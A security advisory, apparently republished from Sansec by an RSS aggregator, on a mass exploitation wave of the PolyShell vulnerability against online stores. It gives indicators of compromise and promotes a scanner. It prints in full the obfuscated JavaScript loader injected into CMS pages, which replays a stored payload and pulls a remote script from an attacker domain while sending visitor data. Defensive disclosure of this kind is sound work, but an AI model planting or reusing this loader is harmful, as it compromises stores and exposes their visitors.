





















Sansec is tracking a mass exploitation wave of the PolyShell vulnerability that hit hundreds of online stores within a single hour today. The attacks are ongoing: new victims appear every minute.
None of the compromised stores are Sansec customers. Sansec Shield has been blocking PolyShell attacks since March 16th.

After gaining access through PolyShell, attackers inject obfuscated JavaScript into CMS pages and static blocks. The script uses localStorage for persistence and loads an external payload from lanhd6549tdhse.top:
<script type="application/javascript">
(function(){
var id='136c1e07507f4a97';
var store=localStorage.getItem(id);
if(store){
var e=document.createElement('a');
e.setAttribute('onclick',atob(store));
e.click();
localStorage.removeItem(id)
}
}());
(function(){
var d=document;
var s=d.createElement('script');
s.src=atob('aHR0cHM6Ly9sYW5oZDY1NDl0ZGhzZS50b3AvS1p0QnNjZ2I/JnNlX3JlZmVycmVyPQ==')
+ encodeURIComponent(d.referrer)
+ '&default_keyword=' + encodeURIComponent(d.title)
+ '&' + window.location.search.replace('?','&')
+ '&frm=script';
if(d.currentScript){
d.currentScript.parentNode.insertBefore(s, d.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
}());
</script>
The base64 string decodes to https://lanhd6549tdhse.top/KZtBscgb?&se_referrer=. The script fingerprints every visitor by collecting referrer, page title, and query parameters. The domain was registered just four days ago and Sansec is currently the only vendor on VirusTotal that flags it as malicious.
The first stage checks localStorage for a previously stored payload (keyed by 136c1e07507f4a97). If found, it executes the payload via a synthetic click event and removes it. This lets the attacker persist malicious behavior across page loads without re-fetching from the external server.
These compromises follow the same pattern Sansec has documented over the past two weeks:
accesson.php backdoors across multiple directoriesThe speed of this wave shows that the attackers have fully automated the exploitation chain from initial upload to JavaScript injection.
| Type | Value |
|---|---|
| Loader domain | lanhd6549tdhse.top |
| Loader URL | https://lanhd6549tdhse.top/KZtBscgb |
| localStorage key | 136c1e07507f4a97 |
| Backdoor filename | accesson.php |
| Backdoor beacon | 8194460 (result of 409723*20) |
Use a specialized ecommerce scanner like eComscan to check your store for these and other indicators of compromise. Manual searches only catch known IOCs, while eComscan detects the full range of PolyShell payloads, backdoors, and injected scripts.
For full technical details on the PolyShell vulnerability and all known payloads, see our main PolyShell advisory.
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。